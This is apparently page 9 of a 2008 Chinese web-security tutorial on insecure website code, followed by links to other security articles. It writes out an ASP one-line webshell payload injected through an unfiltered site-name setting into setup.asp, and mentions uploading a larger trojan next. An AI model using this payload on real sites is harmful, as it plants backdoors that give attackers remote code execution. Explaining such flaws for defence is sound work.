您现在的位置： IT专家网 > 安全子站 > 安全技巧

Web网站程序编写中的安全软肋

作者: 陆羽, 　出处:IT168,　责任编辑: 韩博颖,　

2008-01-31 10:29

因为他并没有对写入的参数进行任何的过滤，所以我们可以手工写入参数，对语句进行提前结束，然后得到一个一句话后门。我们这里修改网站名称好了，改为：测试"%><%execute request("value")%><%a="1，发现修改后的配置文件内容变为：

访问setup.asp返回

证明构造一句话木马成功，接下来就是上传大马，这里就不详细演示了.

共9页。 9 1 2 3 4 5 6 7 8 9 :

解析如何实现自动化的IT安全合规管理
能够解决企业IT、审计和运作团队共同问题的方法一直是企业IT管理者所迫切希望的，自动化的企业合规管理将会及时的发现并掌控企业实际存在的各种问题。
视频讲解：MS Windows系统安全
本文将由7all为IT专家网用户讲解MS Windows操作系统。
浅谈逆向工程在网络安全研究中的运用
从某种程度上来说，计算机软件的逆向工程技术主要过程为分析计算机程序，在分析计算机程序的过程中，逐渐建立起高于源代码级别的更抽象层次的程序运行过程。
评估Vista内核模式的安全性
Windows Vista与之前的MS Windows版本(包括Windows XP SP2)相比增加了很多的安全性。Vista新安全性的特征可以包括驱动签名、PatchGuard、内核模式代码完整性检查等。